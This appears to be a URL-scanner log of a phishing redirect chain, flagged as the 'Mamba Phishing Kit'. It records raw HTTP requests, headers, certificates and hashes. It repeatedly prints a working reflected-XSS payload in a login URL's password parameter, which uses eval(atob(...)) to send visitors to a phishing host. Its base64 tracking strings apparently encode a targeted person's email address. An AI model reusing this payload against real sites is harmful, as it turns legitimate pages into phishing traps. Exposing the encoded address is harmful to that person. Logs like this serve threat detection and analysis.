Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 111865
Origin: https://taxexpertscan.com
DNT: 1
Connection: keep-alive
Referer: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Cookie: _cid=79a110db5e803c22ede226733ed72029
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 301 Moved Permanently
cache-control: no-store
location: https://google.com/404/
content-length: 0
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:37 GMT
server: Apache
X-Firefox-Spdy: h2
GET www.google.com/images/errors/robot.png
142.250.178.100 200 OK 6.3 kB URL GET www.google.com/images/errors/robot.png
IP 142.250.178.100:443
Certificate Issuer Google Trust Services
Subject www.google.com
Fingerprint 84:BD:0D:9A:51:CC:86:3E:E9:2F:6E:7C:2D:58:AC:4C:FB:B5:3D:8C
Validity Mon, 12 May 2025 08:44:44 GMT - Mon, 04 Aug 2025 08:44:43 GMT
File type PNG image data, 171 x 213, 8-bit colormap, non-interlaced
Hash 4c9acf280b47cef7def3fc91a34c7ffe
c32bb847daf52117ab93b723d7c57d8b1e75d36b
5f9fc5b3fbddf0e72c5c56cdcfc81c6e10c617d70b1b93fbe1e4679a8797bff7
GET /images/errors/robot.png HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: SOCS=CAESHAgBEhJnd3NfMjAyMjA5MjktMF9SQzEaAnJvIAEaBgiAkvOZBg
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
accept-ranges: bytes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 6327
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Mon, 26 May 2025 13:16:54 GMT
expires: Tue, 26 May 2026 13:16:54 GMT
cache-control: public, max-age=31536000
age: 356504
last-modified: Tue, 22 Oct 2019 18:30:00 GMT
content-type: image/png
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
GET taxexpertscan.com/s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245 301 Moved Permanently 2.9 kB URL User Request GET taxexpertscan.com/s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Certificate Issuer Let's Encrypt
Subject *.taxexpertscan.com
Fingerprint 95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
Validity Mon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert urlquery phishing Phishing - Mamba Phishing Kit
OpenPhish phishing Generic/Spear Phishing
GET /s?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://accounting-portal.bchsaa.org/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 301 Moved Permanently
location: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
content-length: 347
content-type: text/html; charset=iso-8859-1
date: Fri, 30 May 2025 16:18:35 GMT
server: Apache
X-Firefox-Spdy: h2
GET remotesupport.level8tech.net/appliance/content/noframe.js
50.199.20.75 200 OK 351 B URL GET remotesupport.level8tech.net/appliance/content/noframe.js
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash f2d9ee5baf1c6eb231e24779e00dfd39
640185165c936d7f92ffc640f866c19e4ccce073
70852aaa7a34cdda9d1f7cc1f41bb35f9cfa2a1dce0c22c93f5154aa7f5d8fe1
GET /appliance/content/noframe.js HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "15f-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 235
Content-Type: application/javascript
GET remotesupport.level8tech.net/appliance/content/prototype.js
50.199.20.75 200 OK 163 kB URL GET remotesupport.level8tech.net/appliance/content/prototype.js
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
File type JavaScript source, ASCII text
Size 163 kB (163313 bytes)
Hash 3b4b13dad33b475e11feb26fd3468ecc
3d542e33a9f3eb3cb45e06fe93d08dd4b7490496
dedea3aa22a087b3745c9635e7a3d65e772d57ce590b541a6a32069a0b1d60b9
GET /appliance/content/prototype.js HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "27df1-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 37405
Content-Type: application/javascript
GET remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
50.199.20.75 200 OK 3.5 kB URL User Request GET remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
IP 50.199.20.75:443
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
File type HTML document, Unicode text, UTF-8 text, with very long lines (387)
Hash 40464f8c10e459f99ac4f936d2e5a563
fda2ad081f0638027e128dbcfd69f40527826e1f
ae08fe17acf5dd54375afa67f12df6cec7e53ac20e51a46e8ccffbd5f5fa2f50
GET /appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Encoding: gzip
Vary: Accept-Encoding,X-Requested-With
Set-Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; path=/appliance/; secure; HttpOnly
Set-Cookie: warnings=1614121869; expires=Fri, 06-Jun-2025 16:18:29 GMT; Max-Age=604800; path=/appliance/
Strict-Transport-Security: max-age=31536000
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Feature-Policy: accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; camera 'none'; encrypted-media 'none'; fullscreen 'self'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; payment 'none'; picture-in-picture 'none'; speaker 'none'; sync-xhr 'none'; usb 'none'; vr 'none'
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8